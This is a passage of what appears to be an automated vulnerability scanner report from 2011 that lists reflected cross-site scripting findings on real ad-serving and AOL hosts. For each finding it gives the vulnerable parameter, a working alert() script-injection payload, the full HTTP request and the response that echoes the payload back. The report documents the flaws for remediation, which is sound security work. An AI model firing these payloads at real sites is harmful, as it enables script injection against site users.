               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
g=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&3ece2"-alert(1)-"d2c7ce0c658=1">
...[SNIP]...

1.16. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [cnt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/fixed_size_unit.jsp

Issue detail

The value of the cnt request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb3a3%3balert(1)//c4478348b8 was submitted in the cnt parameter. This input was echoed as eb3a3;alert(1)//c4478348b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1eb3a3%3balert(1)//c4478348b8&width=574&height=100&pageId=20768960 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:08 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Length: 4045


               var doclix_ads_domain = document.location.protocol == 'https:' ? document.domain == 'publisher.doclix.com' ? 'publisher.doclix.com' : 'track.doclix.com' : 'ads.doclix.com';
               var doclix_ifrm_url_1eb3a3;alert(1)//c4478348b8 = document.location.protocol+'//'+doclix_ads_domain+'/adserver/serve/js/doclix_ad_ifrm.jsp?';
           
           var ad_setup_str = 'save_ad_code=Save|delete_ad_code=|ad_unit_type_lu=true|unit_standard_size=574
...[SNIP]...

1.17. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [cnt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/fixed_size_unit.jsp

Issue detail

The value of the cnt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec1a1'%3balert(1)//64b668db5b7 was submitted in the cnt parameter. This input was echoed as ec1a1';alert(1)//64b668db5b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1ec1a1'%3balert(1)//64b668db5b7&width=574&height=100&pageId=20768960 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:07 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Length: 4077


               var doclix_ads_domain = document.location.protocol == 'https:' ? document.domain == 'publisher.doclix.com' ? 'publisher.doclix.com' : 'track.doclix.com' : 'ads.doclix.com';
               var doclix_i
...[SNIP]...
ick_track != 'undefined')
               doclix_ifrm_url_1ec1a1';alert(1)//64b668db5b7 += '&pub_click_track='+escape(doclix_pub_click_track);
           if (typeof doclix_category != 'undefined')
               doclix_ifrm_url_1ec1a1';alert(1)//64b668db5b7 += '&doclix_cat='+escape(doclix_category);
           if (_get_setting(ad_setup_str, 'unit_ad_number')) {
               _get_setting(ad_setup_str, 'unit_ad_rotate') == 'true' ? ad_number = _get_setting(ad_setup_str,
...[SNIP]...

1.18. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/fixed_size_unit.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9a09'-alert(1)-'64baa0df0a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1&width=574&height=100&pageId=20768960&c9a09'-alert(1)-'64baa0df0a4=1 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:08 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Length: 3658


               var doclix_ads_domain = document.location.protocol == 'https:' ? document.domain == 'publisher.doclix.com' ? 'publisher.doclix.com' : 'track.doclix.com' : 'ads.doclix.com';
               var doclix_i
...[SNIP]...
l_str = val_str.substr(0, val_str[iO]('|'));
                   return unescape(val_str);
               } else {return false;}
           }
           doclix_ifrm_url_1 += 'pid=16245&codeId=401&cnt=1&width=574&height=100&pageId=20768960&c9a09'-alert(1)-'64baa0df0a4=1';
           if (typeof doclix_pub_click_track != 'undefined')
               doclix_ifrm_url_1 += '&pub_click_track='+escape(doclix_pub_click_track);
           if (typeof doclix_category != 'undefined')
               doclix_ifrm_
...[SNIP]...

1.19. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [pageId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/fixed_size_unit.jsp

Issue detail

The value of the pageId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39457'-alert(1)-'cf387d9fc83 was submitted in the pageId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1&width=574&height=100&pageId=2076896039457'-alert(1)-'cf387d9fc83 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:08 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Length: 3655


               var doclix_ads_domain = document.location.protocol == 'https:' ? document.domain == 'publisher.doclix.com' ? 'publisher.doclix.com' : 'track.doclix.com' : 'ads.doclix.com';
               var doclix_i
...[SNIP]...
al_str = val_str.substr(0, val_str[iO]('|'));
                   return unescape(val_str);
               } else {return false;}
           }
           doclix_ifrm_url_1 += 'pid=16245&codeId=401&cnt=1&width=574&height=100&pageId=2076896039457'-alert(1)-'cf387d9fc83';
           if (typeof doclix_pub_click_track != 'undefined')
               doclix_ifrm_url_1 += '&pub_click_track='+escape(doclix_pub_click_track);
           if (typeof doclix_category != 'undefined')
               doclix_ifrm_ur
...[SNIP]...

1.20. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 223f2<script>alert(1)</script>718630f8bab was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=1990767223f2<script>alert(1)</script>718630f8bab&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/&v=5&dct=Business%20News%2C%20Stock%20Quotes%2C%20Investment%20Advice%20-%20DailyFinance&metakw=daily%20finance,dailyfinance,finance%20daily,business%20news,stock%20news,stock%20market%20news HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:06 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "1990767223f2<script>alert(1)</script>718630f8bab"

   
                                                           </head>
...[SNIP]...

1.21. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 6a27b--><script>alert(1)</script>4b7d7d76112 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=15056916a27b--><script>alert(1)</script>4b7d7d76112&pid=1990767&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/&v=5&dct=Business%20News%2C%20Stock%20Quotes%2C%20Investment%20Advice%20-%20DailyFinance&metakw=daily%20finance,dailyfinance,finance%20daily,business%20news,stock%20news,stock%20market%20news HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:47:57 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3331


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "15056916a27b--><script>alert(1)</script>4b7d7d76112" -->
...[SNIP]...

1.22. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 25700--><script>alert(1)</script>46ca0f2bc33 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=1990767&ps=-125700--><script>alert(1)</script>46ca0f2bc33&zw=627&zh=195&url=http%3A//www.dailyfinance.com/&v=5&dct=Business%20News%2C%20Stock%20Quotes%2C%20Investment%20Advice%20-%20DailyFinance&metakw=daily%20finance,dailyfinance,finance%20daily,business%20news,stock%20news,stock%20market%20news HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:09 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3770


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-125700--><script>alert(1)</script>46ca0f2bc33" -->
   
...[SNIP]...

1.23. http://adsfac.us/ag.asp [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload d3fe7<script>alert(1)</script>a3a3fcc09ff was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=d3fe7<script>alert(1)</script>a3a3fcc09ff&source=js&ord=24803036 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.fanhouse.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1; FSddf63%3Cscript%3Ealert%28document=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4046&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; FSddf63%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c447564c06=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4045&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; FSQTS038=pctl=287337&pctm=1&fpt=0%2C287337%2C&pct%5Fdate=4053&FL287337=1&FM31975=1&pctc=31975&FQ=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:38:49 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSd3fe7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea3a3fcc09ff0=uid=15683449; expires=Mon, 07-Feb-2011 20:39:48 GMT; path=/
Set-Cookie: FSd3fe7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea3a3fcc09ff=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4054&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Sun, 06-Mar-2011 20:39:48 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sun, 06 Feb 2011 20:39:48 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://ADSFAC.US/link.asp?cc=d3fe7<script>alert(1)</script>a3a3fcc09ff.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

1.24. http://adv-chart-app.app.aol.com/pfsg/sdr [echo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adv-chart-app.app.aol.com
Path:   /pfsg/sdr

Issue detail

The value of the echo request parameter is copied into the XML document as plain text between tags. The payload ad839<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>d81adcd233 was submitted in the echo parameter. This input was echoed as ad839<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>d81adcd233 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /pfsg/sdr?symbols=dji:$indu&service=chartdetail&f=xml&dtype=configurable&tf=d,1&gran=i&fids=i,h,l,o,c,v,pc&q=1&backfill=1&echouri=1&tm=1&dt=1&tr=1&echo=determineTDIsByResponsead839<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>d81adcd233 HTTP/1.1
Host: adv-chart-app.app.aol.com
Proxy-Connection: keep-alive
Referer: http://o.aolcdn.com/os/money/flash/MinimalChart.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; s_sess=%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B%20s_cc%3Dtrue%3B; s_pers=%20s_getnr%3D1297021708679-New%7C1360093708679%3B%20s_nrgvo%3DNew%7C1360093708704%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store,no-cache,max-age=0,must-revalidate,proxy-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/xml;charset=ISO-8859-1
ntCoent-Length: 30296
Date: Sun, 06 Feb 2011 19:51:46 GMT
Content-Length: 30296

<?xml version="1.0" encoding="UTF-8"?>
<response>
   <statusCode>200</statusCode>
   <statusText>OK</statusText>
<echoText>determineTDIsByResponsead839<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>d81adcd233</echoText>
...[SNIP]...

1.25. http://advertising.aol.com/brands/dailyfinance [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /brands/dailyfinance

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3fb31'><script>alert(1)</script>0eb8520e7cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/dailyfinance3fb31'><script>alert(1)</script>0eb8520e7cd HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:20:09 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=536cb75bd33ca159feb9d512a4a6ffdf; expires=Tue, 01 Mar 2011 23:53:29 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 06 Feb 2011 20:20:09 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 23318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<img src='/sites/default/files/webfm/brand-logos/dailyfinance3fb31'><script>alert(1)</script>0eb8520e7cd.png' alt='dailyfinance3fb31'>
...[SNIP]...

1.26. http://advertising.aol.com/brands/dailyfinance [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /brands/dailyfinance

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c6a5"><script>alert(1)</script>8d254a4718e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/dailyfinance?8c6a5"><script>alert(1)</script>8d254a4718e=1 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:19:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=8609cdea69379ae1f1f7ce98cca77dbc; expires=Tue, 01 Mar 2011 23:53:13 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 06 Feb 2011 20:19:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 28080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a name="aol-share" class="aol-share" href="mailto:yourfriend@email.com?subject=Check this out: AOL Advertising | Brands/DailyFinance&body=http://advertising.aol.com/brands/dailyfinance?8c6a5"><script>alert(1)</script>8d254a4718e=1" title="AOL Advertising | Brands/DailyFinance">
...[SNIP]...

1.27. http://advertising.aol.com/brands/engadget [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /brands/engadget

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bdddb'><script>alert(1)</script>9c1db18b1e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

